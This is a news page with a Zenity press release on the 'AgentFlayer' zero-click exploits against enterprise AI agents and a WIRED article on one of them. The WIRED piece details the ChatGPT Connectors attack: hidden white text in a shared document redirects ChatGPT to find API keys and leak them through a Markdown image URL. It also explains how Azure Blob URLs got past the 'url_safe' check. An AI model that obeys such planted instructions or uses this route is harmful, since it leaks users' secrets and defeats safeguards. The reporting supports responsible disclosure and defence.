Latest news with #MichaelBargury
Yahoo
3 days ago
- Business
- Yahoo
Zenity Labs Exposes Widespread "AgentFlayer" Vulnerabilities Allowing Silent Hijacking of Major Enterprise AI Agents Circumventing Human Oversight
Groundbreaking research reveals working 0click compromises of OpenAI's ChatGPT, Microsoft Copilot Studio, Salesforce Einstein, Cursor, and more, exposing widespread vulnerabilities across production AI environments LAS VEGAS, Aug. 6, 2025 /PRNewswire/ -- At Black Hat USA 2025, Zenity Labs revealed AgentFlayer, a comprehensive set of 0click exploit chains that allow attackers to silently compromise enterprise AI agents and assistants without requiring any user action. The research, presented by Zenity co-founder and CTO Michael Bargury and threat researcher Tamir Ishay Sharbat in their session, "AI Enterprise Compromise: 0Click Exploit Methods," demonstrates how widely deployed AI agents from major vendors can be hijacked to exfiltrate data, manipulate workflows, and act autonomously across enterprise systems—all while users remain completely unaware. The findings represent a fundamental shift in the AI security landscape to attacks that can be fully automated and require zero interaction from users. Zenity Labs successfully demonstrated working exploits against OpenAI ChatGPT, Microsoft Copilot Studio, Salesforce Einstein, Google Gemini, Microsoft 365 Copilot, and developer tools like Cursor with Jira MCP. "These aren't theoretical vulnerabilities, they're working exploits with immediate, real-world consequences," said Michael Bargury, CTO and co-founder, Zenity. "We demonstrated memory persistence and how attackers can silently hijack AI agents to exfiltrate sensitive data, impersonate users, manipulate critical workflows, and move across enterprise systems, bypassing the human entirely. Attackers can compromise your agent instead of targeting you, with similar consequences." Key Research Findings: OpenAI ChatGPT was compromised via email-triggered prompt injection, granting attackers access to connected Google Drive accounts and the ability to implant malicious memories, compromise every future session, and transform ChatGPT into a malicious agent A Microsoft Copilot Studio customer support agent, showcased by Microsoft on stage, was shown to leak entire CRM databases. Additionally, we found over 3,000 of these agents in the wild that can reveal their internal tools, making them susceptible to exploitation Salesforce Einstein was manipulated through malicious case creation to reroute all customer communications to attacker-controlled email addresses Google Gemini and Microsoft 365 Copilot were turned into malicious insiders, social engineering users and exfiltrating sensitive conversations through booby-trapped emails and calendar invites Cursor with Jira MCP was exploited to harvest developer credentials through weaponized ticket workflows "The rapid adoption of AI agents has created an attack surface that most organizations don't even know exists," said Ben Kilger, CEO, Zenity. "Our research demonstrates that current security approaches are fundamentally misaligned with how AI agents actually operate. While vendors promise AI safety, attackers are already exploiting these systems in production. This is why Zenity has built the industry's first agent-centric security platform—to give enterprises the visibility and control they desperately need." Industry Response and Implications Some vendors, including OpenAI and Microsoft Copilot Studio, issued patches following responsible disclosure. However, multiple vendors declined to address the vulnerabilities, citing them as intended functionality. This mixed response underscores a critical gap in how the industry approaches AI agent security. The research arrives at a pivotal moment for enterprise AI adoption. With ChatGPT reaching 800 million weekly active users and Microsoft 365 Copilot seats growing 10x in just 17 months, organizations are rapidly deploying AI agents without adequate security controls. Zenity Labs' findings suggest that enterprises relying solely on vendor mitigations or traditional security tools are leaving themselves exposed to an entirely new class of attacks. Moving from Research to Defense As a research-driven security company, Zenity Labs conducts this threat intelligence on behalf of the wider AI community, ensuring defenders have the same insights as attackers. The complete research, including technical breakdowns and defense recommendations, will be available at following the presentation. See the Research in Action Attendees at Black Hat USA 2025 can visit Zenity at booth #5108 for live demonstrations of the exploits, in-depth technical discussions, and practical guidance on securing AI agents in production environments. For those unable to attend Black Hat, Zenity will host deeper discussions at the AI Agent Security Summit 2025 on October 8 at the Commonwealth Club in San Francisco. Reserve your spot now. About Zenity Zenity is the agent-centric security and governance platform that gives enterprises visibility and control over AI agent behavior—what they access, what they do, and the tools they invoke—with full-lifecycle protection across SaaS, custom agent platforms, and end-user devices. Founded by security researchers and engineers from Microsoft, Meta, and Unit 8200, Zenity enables organizations to embrace AI innovation without compromising security. Learn more at About Zenity Labs Zenity Labs is the threat research arm of Zenity, dedicated to uncovering and responsibly disclosing vulnerabilities in AI systems. Through cutting-edge research and real-world attack simulations, Zenity Labs helps organizations understand and defend against emerging AI threats. Subscribe to research updates at Media Contact:Diana DiazForce4 Technology View original content to download multimedia: SOURCE Zenity Sign in to access your portfolio
WIRED
3 days ago
- WIRED
A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT
Aug 6, 2025 7:30 PM Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction. Photo-Illustration:The latest generative AI models are not just stand-alone text-generating chatbots—instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused—and researchers have shown it can take just a single 'poisoned' document to do so. New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and potentially multiplies the ways where vulnerabilities may be introduced. 'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says. OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once—full documents could not be removed as part of the attack. 'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures. Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read. In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized. The prompt says the person is actually a 'developer racing against a deadline' and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt. That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account. Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect if URLs were malicious and stop image rendering if they are dangerous. To get around this, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work, that the researchers used URLs from Microsoft's Azure Blob cloud storage. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes. The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, activating a smart home's lights and boiler remotely. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also allow malicious hackers a way into an organization's other systems. Bargury says that hooking up LLMs to external data sources means they will be more capable and increase their utility, but that comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.
